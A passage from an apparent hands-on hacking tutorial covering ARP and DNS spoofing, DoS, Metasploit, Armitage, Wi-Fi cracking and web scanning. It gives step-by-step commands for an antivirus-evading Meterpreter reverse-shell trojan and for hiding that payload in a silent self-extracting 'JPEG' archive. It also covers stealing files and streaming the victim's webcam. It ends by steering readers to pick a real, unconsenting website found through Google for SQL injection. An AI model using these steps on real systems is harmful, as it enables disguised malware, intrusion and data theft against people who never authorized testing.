and route the traffic to their machine. This kind of attack has some legitimate
uses in some cases. For example, especially in server fail-over cases, some
server can take on the traffic of another server in case of a failure. But this is
not well used because it needs dedicated tools to be employed.
To execute an ARP poisoning attack, go to the Windows machine, which is
the victim's machine, and type ipconfig . The default gateway of this machine
is 192.168.211.2. In order to get the MAC address of this default gateway,
just type the command arp-a , and you will find the cached entries on this
machine. The first entry is the default gateway and the MAC address ends
with d2, as shown below. Don’t forget to invoke the sudo command.
Our aim is to change this cached entry. Now go to your Kali machine and
open a terminal, write ifconfig to get the MAC address of this machine,
which again is a malicious machine that has an illegal access to the network
of the victim.

As demonstrated in the image above, the MAC address the KALI machine
ends with 4b. A good tool to do the ARP poisoning attack is called Ettercap,
it is found under sniffing and spoofing tools. Open the application, press on
the Sniff menu and press on unified sniffing and select the interface, and then
you go to the Host menu and press on Scan for hosts. Ettercap will identify
all the hosts on the network. If you want to see the host list, just press on the
Hosts menu , and then Host list sub-menu. Select the IP address of the target
machine, in our case it ends with .129, and then press on Add to Target 1
button. Next go to the Mitm menu (can be a menu icon), and select ARP
poisoning, select the option of only poison one-way, and press OK. Now a
fake ARP reply has been sent to the target machine. To verify this, go to the
target machine and type arp -a again in the command line.

Perform a DNS Spoofing Attack

DNS-based attacks are on the rise because many organizations do not realize
DNS is a threat vector and therefore do not protect it. Now, we will discuss
an important DNS attack named DNS spoofing or cache poisoning; you can
use these words interchangeably.
DNS or domain name server is a piece of software that translates human
readable domain names such as google.com, facebook.com to IP addresses
that are used throughout communication over the internet.
Normally, if the server does not know a requested translation, it will ask the
next DNS server to do this translation for it, and so on so forth, this is called
recursion. To increase the performance, DNS servers usually cache these
translations locally for a certain period of time before it expires. This means
if the DNS server that caches these requests receive a similar request, it will
not go into recursion or forward the request to the next DNS server, but will
reply directly from its cache.
So, here is the vulnerability, when a DNS server receives a false translation
of a domain name to IP, it will cache this false translation for optimization
purposes; now we consider the DNS server as being poisoned as it will
supply the client with the wrong IP address, which is usually an attacker's IP
address. Let us go directly to our Kali machine, and demonstrate this attack.
Go to www directory, and create a simple HTML page just for this sentence,
"You have been hacked", as seen in the two images below. Our plan is to
redirect the victim, our target client, to this fake page.
We will use the Ettercap application again, but before doing that, let us do
couple of things. We have to do some configuration first, so type in locate
then etter.conf in your terminal.

Before starting with this attack, make sure to change the UID and GID to
zero. Default configuration starts with 65, whatever number is, just make sure
that it is zero, so you can use this file.
You can see the file has lots of translations, we’re interested in these
translations, so make sure to comment microsoft.com entries for the
hostname, just make the pointer there without comment and add a star, so we
will be creating a host entry and redirect them to the local IP, as shown
below. And make sure to save the file and then close the file.

Now open the Ettercap application, and start sniffing on the interface, then go
the Hosts menu, and scan for hosts submenu. Now we will be able to
discover the hosts available on the network. Select the target machine, that
ends with .129 in our case, and press on Add to Target 1. Go to the Mitm
menu (can be a menu icon), select ARP poisoning sub-menu, tick Sniff
remote connections, and press OK.
Now go to the Plugins menu, click on Manage plugins sub-menu, click on
dns_spoof plugin to activate it. Now everything is up and running. Go the
victim's machine and try to browser any website, to be redirected to our fake
page.

Identify a DNS Zone Transfer Vulnerability

In this section, I will discuss another type of attacks on DNS, named DNS
zone transfer vulnerability. DNS zone transfer is a replication process
between two servers, master server and the slave server; where the slave
server requests a copy of its own file from the master server; depending on
the configuration of the master server, a transfer might take place or not.
In the below image, notice that a DNS zone transfer is configured to take
place only to one server with a specific IP address. Unfortunately, some
companies mix their internal and external DNS names basis, so that if DNS
zone transfer is misconfigured, you end up with a full map of the network,
which is a very important piece of information to start with.
The information that might be revealed from a DNS attack or DNS
reconnaissance are many, such as start of authority (SOA), name servers
(NS), any hosts configured on the DNS, canonical names, pointers, MX
records, etc. Having such type of information is priceless for any attacker in
the planning phase.
We will use a tool named DNS Recon, an advanced DNS enumeration script
written in Python, mainly used for DNS reconnaissance. It can enumerate
DNS records, perform zone transfers and reverse lookups. You can invoke it
by typing dnsrecon . You can type help to be able to get all the help on the
arguments needed to run the script.
Let us go directly to an example, type dnsrecon , and the -d argument which
stands for a domain, I will use a domain called zonetransfer.me and invoke it.
dnsrecon -d zonetransfer.me -a
DNS reconnaissance has started, the script will get all the information about
the SOA record, the name servers, the MX records, all of these information
as well as the txt record, which is mainly used to preserve the originality of
sending emails and the privacy of your domain.
The -a argument will instruct the server to perform a zone transfer. The
process will take some time, but actually you can notice that zone transfer has
been done successfully, as seen below.

The script will loop through all the name servers and get all the DNS records.
It will try the first name server, and this would result in all information
associated. Similarly, the second name server would result in all the
information of the records as well.

Plan DOS and DDOS Attacks

Denial of service is a simple attack which aims to prevent the target system
from operating as it should. In a simple form; it uses up all the system's
resources so that other people cannot connect legitimately and use the server.
DOS attacks are the easiest that we will learn through this book, it only
requires installing an application, entering the target IP, and pressing enter, to
run the attack.
DOS attacks can be categorized under three main categories; volume based,
protocol-based, and application layer attacks.
Volume-based attacks occur when the attacker sends a large volume of
packets to the target machine, thereby fully consuming the available
bandwidth.
Protocol-based attacks occur when the attacker utilizes all the resources of
the target machine. Such attacks include smurf attacks, fraggle attacks, SYN
floods and Ping of Death. Here we are not utilizing the bandwidth but rather
utilizing the resources of the server.
Application layer attacks occur when extensive application layer requests are
being sent to web servers such as Microsoft IIS or Apache server with the
intent to crash it.
DDOS attacks have the same arrangement, but involves simultaneous attacks
from different locations and IPs.
In order to perform a DOS attack, open the terminal, and type ettercap -G .
Go to the Plugins menu, Manage plugins submenu, and select dos_attack
plugin, double click on this plugin, and enter the target IP once prompted, to
start the attack, as shown below.
All-in-one Metasploit Framework
Metasploit is a framework that contains an extensive collection of exploits; it
is one of the most popular open source free tools for security professionals;
there is a commercial version available as well. In this section I will cover the
basic structure of Metasploit along with some techniques on how to use it. In
the upcoming sections, we will put what we will learn to practice.
We will start with the framework architecture depicted below. You can
access Metasploit using its interfaces, either through console, command line
interface, or the web version or other GUI tools that we will discuss later. The
underlying modules of Metasploit are five; payloads, exploits, encoders,
Nops and AUX.
So, let us start with basic definitions before going further into the details.
What is a module?
Module is a piece of software that can be used by Metasploit framework.
What is vulnerability?
Vulnerability is the weakness in the target system such as the system is not
patched or does not have an antivirus etc. Through this vulnerability or this
weakness a successful access will occur.
What is an exploit?
Once a vulnerability is identified, an attacker will take advantage of it and
breaks into the system using a certain code or script written which is known
as an exploit.
A payload is a set of tasks that are initiated by the attacker subsequent to the
exploit in order to maintain access or do other tasks on the compromised
system. You can call these listeners, rootkits etc.
What is a shellcode?
It is set of instruction used as a payload when the exploitation occurs, which
results in the command shell being exposed.
Encoder is used to obfuscates the payload so that it does not get detected by
intrusion detection systems or antivirus. It sorts of wraps the payload in an
alternative way, so that it does not get easily detected.
Auxiliary provides additional functionality to the system such as scanning,
recon and the UX attacks. Nops are a piece of software that prevents the
payload from crashing on x86 systems by using jump systems, do not worry
about that as we will not use it.
Metasploit modules are files are available under /usr/share/metasplot-
framework, as seen below.

We will use the console command to run Metasploit, so open your terminal
and type msfconsole , and press enter. It will take some time to initiate the
database and connect to it. You will notice that the cursor has changed as we
are in the Metasploit framework now. Before going further you might have
noticed that the architecture has libraries as well. We have three main
libraries which are Rex, MSF core and MSF base.
The Rex library is the basic library for most of the attacks. It handles
operations like protocols, text transformation, sockets, etc. The MSF core is
the core library that provides basic API, and the MSF base provides like
additional or friendly API.
As of now, this framework has around 2000 exploits, 1000 plus auxiliaries,
560 payloads, and 45 encoders.
With a large number of exploits, searching becomes necessary. The easiest
way of using the search function is to issue the command search followed by
a search term. For example, type ‘search exploits’ to retrieve all the exploits
are available in the framework at the time being, the description of the
exploit, the name of the exploit, etc.
We can improve the search process by specifying the platform that we are
looking for exploits into. So, we can select Windows operating system for
example, and we will get all these exploits related to the Windows system
which are many. A better example is to narrow the search to Android to
notice that it returns the exploits that pertain to the Android platform. To
select an exploit, type in the word use, then show info to retrieve the
description of the exploit.
In the example above, we have chosen to use the exploit
payload/php/reverse_php. To setup the exploit, issue the show options
command. Notice that the argument LHOST is empty, and we need to
populate it as it is required. You can do that using the command set LHOST
and then an IP address. Type show options again, to see he populated
argument, as shown above.
Type show payloads , to view the payloads related to the current exploit.
You can now use these payload along with the exploit.

To use the aix/ppc/shell_reverse_tcp payload for example, type the keyword

use, as shown below.

Create Your First Trojan and Infiltrate a Target

How will we engineer this attack? First, we will create a malicious executable
program, the payload, for the target to host – a Windows 10 machine. Then,
we will run this file on the target host to expose its shell to our Kali machine;
so that we remotely control the victim’s machine.
Step 1: We will run Metasploit. You can run it directly or you can use
service PostgreSQL start first to start the database services. After that, we
will run Metasploit, using msfconsole , as shown below. It is important to
note that this attack can be done on a LAN as well as over the internet; you
just change the IP addresses from private to public. Remember to use the
sudo command if you are using the default kali account. If you face any
issues, run the commands gem install bundler:1.17.3, then bundle update --
bundler.

Step 2:MSFvenom is a combination of two commands that are there in

Metasploit, which are the MSFpayload and the MSFencode. Now they are
both in a single command, which is called MSFvenom.
Earlier, the MSFpayload was used to generate the payload in a specific form,
and then the MSFencode was used to encode the payload using various
algorithms. Now you can use one command to do both actions. After that
specify the payload, we will use windows/meterpreter/reverse_tcp. As we
said that the victim will expose its shell to us and we will be able to control it
remotely.
There are lots of encoders, such as Shikata Ga Nai, and then you specify how
many iterations this encoder will do to this payload, I will select 10 iterations.
Let us now, create a file called trojan.exe, as shown below:

Open a new terminal. Use ls command to check if trojan.exe has been

created.
Step 3: Now we are ready to move the file to the victim's machine and
execute it there. Upon successful execution, the target system will be fully
compromised, and we will be able to control it remotely. The result will be a
meterpreter for us, which is a command line to perform any type of
commands remotely.
Move the file to the Windows 10 machine in your lab. In the real world, the
file is downloaded to the victim’s machine using various social engineering
techniques.
Step 4: Go to your Kali machine and type this command in Metasploit.
use multi/handler
set payload windows/meterpreter/reverse_ tcp
set LHOST 192.168.211.130
set LPORT 5555,
which will listen to the incoming connections from the victim
exploit
You will notice that this session has started a reversed TCP handler on the IP
to 192.168.211.130, which is our IP. If you go to the victim’s machine and
double click on trojan.exe, a meterpreter session will be open between the
two IPs, 130 and 129. Now we have a meterpreter shell. Type help to see all
the commands you can run on the compromised system.

Step 5: Some of the initial post-exploitation commands you can use are:
sysinfo , to see the system info of Windows 10. You will be able to see the
computer name, the OS, the architecture, the domain or a workgroup, and the
current logged on users.
ls , to list the directories
ipconfig , to see the network configurations of the remote machine
You can as well search for any files on the compromised system. For
example, you can search for files of any type and download them to your
machine. In the below example, I will be downloading the file hobbit.txt. Use
the download command and paste the path and make sure to change the back
slash to forward slash.

You can go to a new terminal, type ls to verify that the hobbit.txt file has
been downloaded. You can do the same for any file on the compromised
machine.

One of the most important commands we can use is the shell command.
Once we use it, we will be able to acquire a Windows shell; now you can
type in all the commands you are familiar with.

Explore the Powerful Armitage Tool

Armitage is a GUI tool for Metasploit, it visualizes targets and recommends
exploits, in addition to exposing a lot of post-exploitation features. Armitage
allows more than one person to carry out an attack by sharing the Metasploit
session, which comes handy for a team performing an attack. Armitage
automates lots of the tasks that are somehow difficult to do in Metasploit.
Armitage allows you to take advantage of a compromised target to launch an
attack from this compromised target to the LAN, or pivoting.
First of all, you need to install Armitage using the command sudo apt-get
install armitage . Open a terminal and run the postgresql service. Running
this service is useful load Armitage faster. Now type armitage , and press
enter. The other way to run Armitage is from the main menu, under the
exploitation tools. Remember to use the sudo command if you are using the
default kali account.

Press on connect and choose yes to load the graphical interface.

The interface is easy to understand; it has three panes. The first pane is the
target pane, and the second pane is the module pane which we already
discovered under the Metasploit section the third pane is the console pane.
Let us start by doing a quick OS scan for our network. Go to the Hosts menu
→ Nmap Scan → Quick Scan. Enter the subnet once prompted. Wait for a
while before Armitage populates the available operating systems on the
network.
In the example below, the scan returned me five machines, two of them are
Linux and two of them are Windows. You can notice the icon of the
operating systems are displayed for ease of use.

One of the important features of Armitage is the Hail Mary. It is the Brute
force, in a way Armitage will try all of the relevant attacks possible on a
target. This attack is noisy, as it will consume the network a lot. It is not
recommended to try it, meanwhile it is recommended to try individual
attacks. The module pane is a file tree structure which is easy to navigate.
The command line pane or the console pane will show you the commands
that are being invoked by Armitage.
Let us create a payload, move it to the Windows machine, run the payload
from the Windows machine, and acquire a Meterpreter session from
Armitage. To do this, go to the modules pane,
payloads → windows → meterpreter, select meterpreter_reverse_tcp and
make sure to select a port that is easy to remember, for example 9090. From
the output, select exe file. Then we create an exe file, which is our payload.

Create a file named virus101.exe, and move it to the Windows machine

(victim’s machine).

Under the Kali machine, we need to create a handler to manage the incoming
connection from the compromised target. Again, double click on
meterpreter_reverse_tcp. Select multi handler and make sure you use the
same port that we used earlier.

A session will be created, listening to incoming connections on port 9090. To

emulate the attack, go to the Windows machine and double click on the
virus101.exe file. Notice that a Meterpreter session has been open in the Kali
machine. Notice the icon of the compromised target under Armitage, shown
below.

So, what can we do now?

Under Metasploit, we needed type in certain commands in order to
manipulate the target system, but it is much easier in Armitage. Right click
on the compromised system, go to the meterpreter session, where you will be
able to see a list of attacks or actions that you can perform. You can easily
browse files; list drives, as well as acquire a command shell. Some of the fun
stuff you can do on your compromised lab machine is to have a screenshot of
the current desktop and stream live data from the webcam.
Armitage is a really powerful tool and I just have given you the basics for
you to explore and learn more.

Hide a Payload in a JPEG Image

In the real world, moving the payload file you have just created on Armitage
to the target machine is not easy as you may think. It happens through lots of
channels of social engineering that we will learn later in this book. I will give
you a glimpse; we will hide the payload in a JPEG file.
Download a nice image from the internet that you will be using as your bait.
In the below example, I have downloaded a JPEG image and converted it to
ICO on one of the free website. Now we have the following three images.

As a pre-requisite for this attack, you need to install WINRAR on your

Windows machine. Select the payload file and the JPEG file; press right click
and select add to archives, tick Create an SFX archive, as shown below. SFX
is a self-extracting file; once you double click on it, something will happen
silently in the background. The trick is to let the user double click on our
SFX file and just see a JPEG file being displayed. But actually, what is
happening in the background is that our payload is being run as well.
So, select Create SFX archive, go to the Advanced options, select as SFX
options, go to Text and Icon tab, just select the smiley icon. Then go to the
modes and on the side Mode tab, select hide all, so the user will not see what
is happening in the background. Then go to the Setup tab, and select the
program that will be run after the use of double click on the file. So, we will
run this JPEG file, and we will also run the virus101.exe, as shown below.
Now everything is ready; just double click on SFX file and a very nice JPEG
image will be displayed. Go again to the Kali machine, you will see that
session has been created for this target machine. Right click on the
compromised machine and enjoy exploring the various types of attacks under
the meterpreter session created.
How to Attack Modern Wireless
Networks?
Introduction
Several standards exist to allow the interaction between different Wi-Fi
devices or wireless enabled devices. The most famous standard is the IEEE
802.11 with its various specifications like the A, B, G and N. This standard
doesn't specify anything related to security. From here, researchers have to
come up with extensions in order to allow the establishment of certain
security mechanisms and these extensions are called WEP, WPA, WPA2 and
WPA3 has been approved since the beginning of 2018.
Security in a network where no physical security exists is really a big issue,
and you're exposed to different kinds of attacks such as man-in-the-middle
attack, someone can capture your session and redirect you to somewhere else.
So it's really important to know about wireless security.
WEP was introduced in the 1990s, while WPA2 in 2004, and then WPA
2005. The Cipher is RC4 for WEP and WPA and it's the enhanced AES for
WPA2. The key size varies from 40 bits in WEP to one to 120 bits in WPA
and WPA2. The key is static in WEP, so for that it's prone to attacks, while
the key encryption changes uniquely in WPAs.
WEP WPA WPA2 WPA3
Year 90s 2004 2005 2018
Cipher RC4 RC4 AES GCMP 256
Key Size 40 bits 128 bits 128 bits Up to 192 bits
Encryption Static Unique Unique Unique
Key

WPS stands for Wi-Fi Protected Setup. It allows you connect to your wireless
router faster and easier. WPS only works on wireless devices that support
WPA Personal or WPA2 Personal. It doesn’t work on devices that use WEP.
Typically, if you want to connect a device to a wireless network, you must
know the SSID and the password, except it’s an unsecured Wi-Fi network.
However, you don’t need to enter any password if use WPS button.
To connect a device, such as your laptop, or smartphone, to a wireless
network with the WPS feature, press WPS button on your router. Go to your
laptop or smartphone, select and connect to your wireless network name.
Your device will automatically be connected to the wireless network, without
asking you provide any security password. This method works for all devices,
including wireless range extenders, or wireless printers. It helps you make a
quick connection between your Wi-Fi router and your device.
Why Wi-Fi Protected Setup is Insecure?
Along with this “Push To Connect” feature, you can also fill out a PIN (eight
numbers) to connect to your wireless router. All wireless routers that come
with the WPS feature always have this eight-number PIN code. It is an
automatically generated code and can’t change. If your wireless router
supports WPS, but don’t have a WPS button, the Wi-Fi connection can be
established with this PIN code.
However, rather than check all eight numbers, many wireless routers only
check first four numbers. Therefore, the WPS PIN code can be guessed with
the brute-force method. Many routers don’t have the limitation function that
defines how many times you can try. So, attackers can guess the PIN code
over and over and over again, with the help of tools.
This “Push To Connect” feature is more secure than the PIN method. The
reason is attackers only can access your wireless network by physically
getting into your home, walk to your router and then push the WPS button.
How to Disable WPS (Wi-Fi Protected Setup)?
Most wireless routers enable WPS feature by default. If you want to disable
it, access the administrator control panel of your wireless router via IP
address, Once you have accessed, locate the WPS feature and disable it.
Depending on the brand of your wireless router, the WPS function can be in
different locations.
So even if you change the common phrase and WPA, you can still run some
applications in Kali to recover the password in a means of seconds, not even
minutes.
We will approach each wireless protocol or setup differently to perform our
attacks. For WPA2, we will be using airmon , airodump and aireplay
tools. Airmon puts the wireless card into monitoring mode, so it will monitor
what's going on around you. The airodump will save the traffic that's going
on around you to a PCAP file. Aireplay will enable you to inject packets into
this traffic; we'll see this in details.
By default, the virtual machine version of Kali does not have access to the
built-in network card. So, I will be using an external USB Wi-Fi adapter. A
TP link wireless USB adapter is recommended. Press connect and you will be
able to have a Wi-Fi connection on your virtual machine, as shown below.
You can as well use Kali live bootable DVD for the purpose of this setup.

WPA and WPA2 Cracking

Open the terminal and type airmon-ng to list the wireless interfaces on your
computer. The main wireless interface will be wlan0. The plan is to enable
this interface to listen to the wireless network connections around us. We
need to enable that by using the command airmon-ng start wlan0 . If you get
some errors related to processes, you can stop them using the command kill
<process number> . Issue the airmon-ng command again, and notice that the
name has changed.
Now we need to capture the traffic of the wireless networks around us and
dump this traffic in a file. The tool to go for is airodump-ng , as shown
below. Again, remember to type sudo if you are using the default kali
account.

This command will help us capture all the wireless traffic in our range. The
BSSID is the MAC address of access point or Wi-Fi. The CH represents the
channel in where the connection is running on, the encryption type is mostly
WPA2 for all, and ESSID is the name of the connection. I will do this attack
on my network named Majo. Press control + C to stop the capture.

Now that we have some information about the access point we need to attack.
The next step is to feed those arguments to airodump-ng in order to write
the traffic related to the specified hotspot to a file. We will use airodump-ng
with arguments such as w to specify the file that we will capture the traffic to,
let us name it attack1. The c argument is to specify the channel number,
which is channel five in our case, and then BSSID which is the MAC address
of the access point.
airodump-ng -w attack1 -c 5 –bssidE4:6F:13:31:65:1C wlan0mon
Now you will see all the endpoints connected to the specified hotspot. The
cap file will be capturing all the related traffic under the BSSID specified. In
order for us to perform the attack, we need one more thing; to capture the
wireless handshake. We have two options here; either you do this manually
since we are testing on our local spot. So, you disconnect one of your
workstations or smartphones from Wi-Fi and reconnect again, so that you
will be able to capture the handshake, or you can inject a de-authentication
packet so that certain Wi-Fi client will reauthenticate, thus you will be able to
capture the handshake.
To do that, open the terminal and type the airplay-ng command as shown
below. The zero argument is for de-authentication, the argument 10 is to
specify the number of de-authentication packets that you need to send, you
can use any number, the -a argument specifies the source MAC address of
the hotspot. We need to send these packets to a workstation or a smartphone
connected to the hotspot, here you specify the host Mac address using the c
argument. The WPA handshake should appear on the active traffic capture
screen, as shown below. and you will be able to get a capture file with a
handshake.
aireplay-ng -0 10 -a E4:6F:13:31:65:1C -c 0C:8C:24:0F:66:A8
wlan0mon

Now that we have a cap file that has a WPA handshake, we are ready to crack
the “Majo” Wi-Fi network. Type in the command aircrack-ng with the -w
argument, which stands for a word list. The thing here is that WPA2
networks are very strong and we cannot just crack them by trial and error like
we do for example in web. So, we need to use word list. Depending on if you
have a strong word list, you will be able to crack this hotspot better, if you
have a weak word list, you will not be able to crack that.
I will use a wordlist that I have created. The aircrack-ng command will go
through all the passwords in the file and try them. Argument -b stands for
the BSSID we are attempting to crack. End the command using the cap file
we captured, as shown below. We are now ready, just press enter, and you
will see that the key was found, as shown below.

WPS Cracking
In the previous section, we cracked a WPA2 access point after capturing a
wireless handshake, and running the file capture against a wordlist. The
efficiency of the attack will mainly depend on the strength of your wordlist.
Sometimes the passwords will have upper characters, special characters,
numbers, etc. and it can take years to crack and access a hotspot. Here comes
the WPS cracking to offer an added value in terms of cracking an 8-digit pin
on the router and not a password. Luckily, we don’t need to crack the full 8
digits, but the first four, which gives us a realistic combination of number to
guess.
The good thing once you have the WPS PIN; is that even if the victim
changed their WPA2 password, running Reaver tool against the same access
point with the same WPS PIN will give you the current password or the
changed password in a matter of seconds.
So, let us go directly and run this Reaver application. First of all, enable the
monitoring mode on your network interface using the airmon-ng command,
then issue the command wash -i wlan0mon . This command will show you
all the neighboring access points, you will see the version of the WPS and
whether it is locked or not.
Go to the terminal again and type reaver -i to specify the interface, and then
-b to specify the access point MAC address, and run -vv which stands for
very verbose to view the updates on the terminal. Invoke the command and
leave it overnight, at the end, the Reaver will display WPS PIN and will
display the current WPA2 password.
reaver -i wlan0mon -b E4:6F:13:31:65:1C -vv
Suppose that the victim changed his password, all we have to do is to run
Reaver again with the same command plus the eight digit PIN that you
already got from the previous attack (12345670 in this example), and Reaver
will just display the new password within a matter of seconds.
reaver -i wlan0mon -b E4:6F:13:31:65:1C -vv -p 12345670

4+ Ways to Attack a Web Application

Web Applications Attack Surface
First appearing in 2003, and continuing with the regular updates, the OWASP
Top 10 is a compilation of the top 10 most critical application security risks
and vulnerabilities which is produced with the goal of empowering
developers, security teams, and IT people, to ensure that the applications they
use and build are secure against the most critical and known cybersecurity
risks.
OWASP is now the de facto standard for web applications security. As
application security threats are constantly evolving, the current OWASP top
10 is the 2017 list on the right side as shown below.

This list includes detailed best practices for both the detection and
remediation of vulnerabilities. Building on the success of the previous
OWASP top 10, which is the 2013 version available on the left side, OWASP
has produced an updated list.
The OWASP compilation is mainly done by examining both the occurrence
rate and the overall severity of each of the threats. A couple of things
changed from the 2013 version to the 2017 version, two of the items, which
are A4 and A7 from the 2013 version, institute direct object reference, and
missing function level access control, were emerged to one item in the 2017
list, which is the broken access control. Couple of items from the 2013 lists
didn't qualify to be in the 2017 list, which are the cross-site request forgery,
and invalidated redirects and forward. On top of that, we have a couple of
new items in the updated list, which are the XML external entities
vulnerability, insecure deserialization, and insufficient logging and
monitoring.
Injection
If your application is receiving user input that goes to the back-end databases;
then your application might be vulnerable and can face code injection attacks
if the input is not handled well. Injection attacks are set of security
vulnerabilities which occur when an attacker sends untrusted data to an
interpreter that is executed as a command without proper authorization.
Injection types are SQL, OS and XXE, which are the XML external entities.
Broken Authentication
When an application functions are not implemented correctly, the attack
surface is open for attackers to easily break in and compromise password,
session IDs, etc.
So, sessions should be unique to each individual user and without some
necessary session management, an attacker can sneak and steal credentials
and information.
Sensitive Data Exposure
As the name says, it occurs when security controls such as HTTPS are not
implemented correctly, thus leaving a hole for attackers to steal sensitive
information such as financial data, usernames, password, IDs, PII
information, etc.
XML External Entities
XML external entities attack is a type of injection attack, and it happens when
the application parses or takes XML input and parses them. The attack occurs
when the XML input contains a reference to an external entity that is
processed by a weak XML parsing, so this attack will lead to different
leakages such as disclosure of information, denial of service and server-side
request forgery.
Broken Access Control
Broken access control is a result of merging the insecure direct object
reference and missing function level access control. Access Control is meant
to control what authorized users are allowed and are not allowed to do within
a web application and to establish proper access control. When this is not
implemented correctly, attackers will exploit this to perform unauthorized
tasks.
Security Configuration
Security configuration is the most commonly seen issues according to
OWASP, strong security requires good and secure practices of configuring
applications, frameworks, servers, databases etc.
Cross-site Scripting
Cross-site scripting is the most famous one on the list in my opinion, and it
allows attackers to inject client site scripts into public facing web pages.
Insecure Deserialization
Serialization is the process of turning some object into a data format that can
be restored later. Users serialize objects in order to save them to storage or to
send as part of communications. Deserialization is taking data structure from
some format and rebuilding it to an object.
Using Components with Known Vulnerabilities
It’s when you use libraries and frameworks in your application from an open-
source community, and in many cases those libraries are vulnerable which
will result in making your application vulnerable as well.
Insufficient Logging and Monitoring
A coupled with missing or ineffective integration with incident response will
allow attackers to further attack your system and actually maintain persistent
attack or persistent access to your system in order to tamper, extract and
destroy data.

Metasploitable VM
The metasploitable virtual machine is an intentionally vulnerable version of
the ubuntu Linux. It is designed for testing your security skills in terms of
penetration testing and ethical hacking. It is available as a VMware image,
you can browse to the rapid seven website or GitHub and download the VM
from there, import the VM to your player, and once the machine starts, you
will be presented by this console as shown below.
You just have to type the msfadmin as username and msfadmin as the
password, and then write ifconfig to see the IP address of this machine, in
this case below, it is 211.139.
Now, we will go to our browser and type this IP address, we will be
presented by a list of web applications like TWiki, Phpmyadmin, Mutillidae,
DVWA and WebDAV. All of these are deliberately vulnerable web
applications which come pre-installed in the metasploitable tool image.
To access any of these applications just press on them, and as you can see
below, this is the Mutillidae web application.

It contains all of the vulnerabilities from the OWASP top 10, plus a number
of other vulnerabilities inspired by the damn vulnerable web application.
Mutillidae allows the user to change the security level, you can toggle the
security as you can see below.
If the application is damaged by the user injection and hacks, just click on the
reset DB, and you will reset the application to the original state. You can test
your skills on the OWASP top 10 by clicking on the left menu and all the top
vulnerabilities are presented.

As for the damn vulnerable web application (DVWA), just use the username
of ‘admin’ and the password ‘password’, then you will be presented by the
homepage which has enough instruction. The damn vulnerable application is
a PHP/MySQL web application that is actually as its name says, it is
vulnerable. Once again, the main goal of that is to aid you in testing your
skills for penetration testing and ethical hacking.
Discover Vulnerabilities in Websites
Nikto
Nikto, is an open source web server scanner, which performs comprehensive
tests against multiple vulnerabilities, including dangerous files, outdated
versions, and mainly the OWASP top 10 vulnerabilities.
Nikto performs over 6,000 tests against a website. The large number of tests
for both security vulnerabilities and misconfigured web servers makes it a go
to tool for many security professionals and systems administrators.
It is important to mention that it is very wise to start with scanning a website
before performing any penetration testing on it. Let us get to the bread and
butter of that, just open your Kali terminal, write nikto -h, and you will see
the help menu. One of the important switches that we will use is the format
and the tuning. For the tuning, you can choose your scan to perform tests
against these vulnerabilities including SQL injections, file upload,
information to disclose and etc.
Now, if you go to your web server, your web browser, I have installed
metasploitable tool on this IP as shown below.
It is just a virtual machine; it contains various web applications. For example,
Damn Vulnerable Web Application. I will issue my nikto command against
this web server:
nikto<dash>h , which means host and then just put the IP of the server, and
then press enter.

It will start giving some information about the server, the websites hosted on
Apache are using Ubuntu Linux server. Nikto will get some of the
vulnerabilities that are included on the server; such as the process scripting
production header is not defined, x content type options header is not set. As
well, there are some OSVDB, which is open source vulnerability database,
which is similar to the common vulnerability exposure CVEs, you can just
look them up on the internet and it will tell you exactly what type of
vulnerability that is.
So this is one of the tests that include lots of options, if you want to feel
comfortable, just export it, put <dash> output and then specify the file name
output nikto, and then <dash>Format , make sure to put the F uppercase, and
then HTML and press enter.

It will create the nikto file by loading the results to an HTML format. Right-
click on the file and open in Firefox, and you will be able to see the report in
an HTML format. This is very important, especially if you are a penetration
tester, it is very important to document all the work that you do, it tells you
the target IP, the target hostname, the ports, we can change the port by
issuing the hyphen p switch and just put any port, but by default it is 80. The
server is running Apache version 2.2.8 on Ubuntu, you can see all the
vulnerabilities with the description and the link to the OSVDB entries.
Finally, in conclusion, it is a very handy report.
Now going back again to nikto, as we saw once we issued this -h is that we
can tune our scan for different purposes. Like if you want to scan specifically
for SQL injections, we need to use the argument nine, so let me tell you how
to do that.
Suppose that we do not want to output:
nikto -h<IP> , then Tuning , then number nine.
It will specifically scan this website against the SQL injection attack, and you
can see the results.

Now you can as well use HTTP in the hostname forward slash, and then
specifically mention the application which is the damn vulnerable web
application. That will scan against SQL injection attacks on the damn
vulnerable web application. As you notice, it is a very handy tool; it is very
easy to use, and it is considered somehow a standard for web vulnerability
scanning.
OWASP ZAP
Another useful tool is the integration testing tool for finding vulnerabilities in
web application named OWASP ZAP.
The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular
free security tools and is actively maintained by hundreds of international
volunteers. It is intended to be used by both those new to application security
as well as professional penetration testers. It is easy to invoke just go to
applications, then web applications analysis and click on OWASP ZAP.
Follow the instructions on the screen to start the application. OWASP ZAP is
an easy to use tool, you only need to enter the IP address of the web server or
the web application and just press on the attack button.

Various types of scans are:

Standard mode: This allows you to do anything to your site.
Safe mode: This mode turns off all the dangerous features while scanning.
This mode avoids user to do anything that is possible.
Protected mode: Allows user to scan the site in particular scope. Harmful
actions can only be performed in the sites mentioned in the scope.
ATTACK mode: New nodes are Actively Scanned when founded.
So let us try that by pressing on Automated Scan, and then by typing the IP of
the Metasploitable box. Now click Attack.

OWASP ZAP will run through the list of URLs and the applications in that
box,

It will eventually display color coded vulnerabilities under alerts and will
categorize them by criticality (red, orange, yellow, and blue).

You can as click on a vulnerability; to check more details such as the

description and a recommended solution and references. That is a very easy
and handy tool to use, let us stop that here.

Now, let me tell you about some advanced features of this tool. Most of the
applications today uses password authentication in order to secure their
application. You can select an application, for example, the damn vulnerable
web application, right click on the POST URL which is a link for login
authentication, click on Include in Context → Default context, then select
the authentication method in case you want to provide the username and
password. As you can see below, you can put the username and password
here. You can select the URL, it will pop up the arguments automatically,
just make sure to select username and password.
For the users, just need to add the user of the website in order to authenticate.
So, we will put admin and just write admin and password which is the default
credentials for that and just have to press okay, make sure that session
management is cookie based on which is the default, press OK and then right
click on that and perform the attack again. Just start the scan and it will list as
well the vulnerabilities under the alerts tab in a criticality-based manner.

Control Database Server with SQLMap

SQL map automates the process of detecting and exploiting SQL injection
flows in websites, it simply allows you to take over the database server, yes
just like that. It comes with a very powerful detection engine, many niche
features for the ultimate penetration tester, and a broad range of switches
lasting from database fingerprinting, over data fetching from the database, to
accessing the underlying file system and executing commands on the
operating system via out-of-band connections.
If you open a web browser and go to Google, just type PHPID=1 , this is
known as the PHP ID vulnerability. This search will display a set of websites
that use this vulnerability, they might possibly be vulnerable, and possibly
not.
So, I will take one of the websites on the list, which is "Contemporary
Romanian Writers". Just click on it, as you can notice, it uses the ID equal
one.

